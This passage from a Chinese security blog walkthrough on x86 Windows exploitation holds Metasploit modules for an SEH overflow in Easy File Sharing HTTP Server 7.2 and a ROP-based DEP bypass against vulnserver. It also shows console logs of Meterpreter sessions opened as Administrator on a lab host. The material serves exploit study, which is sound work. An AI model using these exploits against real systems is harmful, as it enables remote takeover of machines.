<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Space'</span> => <span class="number">390</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line"> {</span><br><span class="line"> <span class="string">'Ret'</span> => <span class="number">0x10022fd7</span>,</span><br><span class="line"> <span class="string">'Offset'</span> => <span class="number">4061</span></span><br><span class="line"> }</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-01-16'</span>,</span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> weapon = <span class="string">"HEAD "</span></span><br><span class="line"> weapon << make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> weapon << generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line"> weapon << make_nops(<span class="number">20</span>)</span><br><span class="line"> weapon << payload.encoded</span><br><span class="line"> weapon << <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line"> sock.put(weapon)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
|
||
</li>
|
||
<li><p>exploit</p>
|
||
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set rport 80</span><br><span class="line">rport => 80</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload => windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:46601 -> 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
|
||
</li>
|
||
</ol>
|
||
<hr>
|
||
<h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote>
|
||
<p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p>
|
||
</blockquote>
|
||
<h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p>
|
||
<h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>'TRUN .'+make_nops(target['Offset'])</code><br>Immunity附加进程之后,在服务端发送3000个字符,计算偏移</p>
|
||
<h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># & jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p>
|
||
<h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <span class="number">312</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP'</span>,</span><br><span class="line"> {<span class="string">'Offset'</span> => find it}</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-01-16'</span>))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># & jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> rop_chain = create_rop_chain()</span><br><span class="line"> junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
|
||
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set rport 1000</span><br><span class="line">rport => 1000</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload => windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:44537 -> 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div>
|
||
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
|
||
<div>您的支持将鼓励我继续创作!</div>
|
||
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
|
||
<span>打赏</span>
|
||
</button>
|
||
<div id="QR" style="display: none;">
|
||
|
||
|
||
<div id="wechat" style="display: inline-block">
|
||
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
|
||
<p>微信支付</p>
|
||
</div>
|
||
|
||
|
||
|
||
<div id="alipay" style="display: inline-block">
|
||
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
|
||
<p>支付宝</p>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<div>
|
||
<ul class="post-copyright">
|
||
<li class="post-copyright-author">
|
||
<strong>本文作者:</strong>
|
||
Cool-Y
|
||
</li>
|
||
<li class="post-copyright-link">
|
||
<strong>本文链接:</strong>
|
||
<a href="https://cool-y.github.io/2019/07/10/x86basic/" title="x86-basic 漏洞利用">https://cool-y.github.io/2019/07/10/x86basic/</a>
|
||
</li>
|
||
<li class="post-copyright-license">
|
||
<strong>版权声明: </strong>
|
||
本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处!
|
||
</li>
|
||
</ul>
|
||
|
||
</div>
|
||
|
||
|
||
<footer class="post-footer">
|
||
|
||
<div class="post-tags">
|
||
|
||
<a href="/tags/二进制/" rel="tag"># 二进制</a>
|
||
|
||
<a href="/tags/Windows/" rel="tag"># Windows</a>
|
||
|
||
<a href="/tags/漏洞/" rel="tag"># 漏洞</a>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
<div class="post-widgets">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div id="needsharebutton-postbottom">
|
||
<span class="btn">
|
||
<i class="fa fa-share-alt" aria-hidden="true"></i>
|
||
</span>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
<div class="post-nav">
|
||
<div class="post-nav-next post-nav-item">
|
||
|
||
<a href="/2019/07/09/afl-first-try/" rel="next" title="AFL-爱之初体验">
|
||
<i class="fa fa-chevron-left"></i> AFL-爱之初体验
|
||
</a>
|
||
|
||
</div>
|
||
|
||
<span class="post-nav-divider"></span>
|
||
|
||
<div class="post-nav-prev post-nav-item">
|
||
|
||
<a href="/2019/07/16/linux-pwn-32/" rel="prev" title="Linux Pwn-缓冲区溢出利用">
|
||
Linux Pwn-缓冲区溢出利用 <i class="fa fa-chevron-right"></i>
|
||
</a>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</footer>
|
||
</div>
|
||
|
||
|
||
|
||
</article>
|
||
|
||
|
||
|
||
<div class="post-spread">
|
||
|
||
</div>
|
||
</div>
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="comments" id="comments">
|
||
<div id="gitalk-container"></div>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<div class="sidebar-toggle">
|
||
<div class="sidebar-toggle-line-wrap">
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
|
||
</div>
|
||
</div>
|
||
|
||
<aside id="sidebar" class="sidebar">
|
||
|
||
<div id="sidebar-dimmer"></div>
|
||
|
||
<div class="sidebar-inner">
|
||
|
||
|
||
|
||
|
||
<ul class="sidebar-nav motion-element">
|
||
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
|
||
文章目录
|
||
</li>
|
||
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
|
||
站点概览
|
||
</li>
|
||
</ul>
|
||
|
||
|
||
<section class="site-overview-wrap sidebar-panel">
|
||
<div class="site-overview">
|
||
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
|
||
|
||
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
|
||
|
||
<p class="site-author-name" itemprop="name">Cool-Y</p>
|
||
<p class="site-description motion-element" itemprop="description">Juice is temporary but Sauce is forever</p>
|
||
</div>
|
||
|
||
<nav class="site-state motion-element">
|
||
|
||
|
||
<div class="site-state-item site-state-posts">
|
||
|
||
<a href="/archives/">
|
||
|
||
<span class="site-state-item-count">31</span>
|
||
<span class="site-state-item-name">日志</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="site-state-item site-state-categories">
|
||
<a href="/categories/index.html">
|
||
<span class="site-state-item-count">7</span>
|
||
<span class="site-state-item-name">分类</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="site-state-item site-state-tags">
|
||
<a href="/tags/index.html">
|
||
<span class="site-state-item-count">55</span>
|
||
<span class="site-state-item-name">标签</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
</nav>
|
||
|
||
|
||
<div class="feed-link motion-element">
|
||
<a href="/atom.xml" rel="alternate">
|
||
<i class="fa fa-rss"></i>
|
||
RSS
|
||
</a>
|
||
</div>
|
||
|
||
|
||
|
||
<div class="links-of-author motion-element">
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
|
||
|
||
<i class="fa fa-fw fa-github"></i>GitHub</a>
|
||
</span>
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
|
||
|
||
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
|
||
</span>
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
|
||
|
||
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
<div id="music163player">
|
||
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="110" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90"></iframe>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</section>
|
||
|
||
|
||
<!--noindex-->
|
||
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
|
||
<div class="post-toc">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
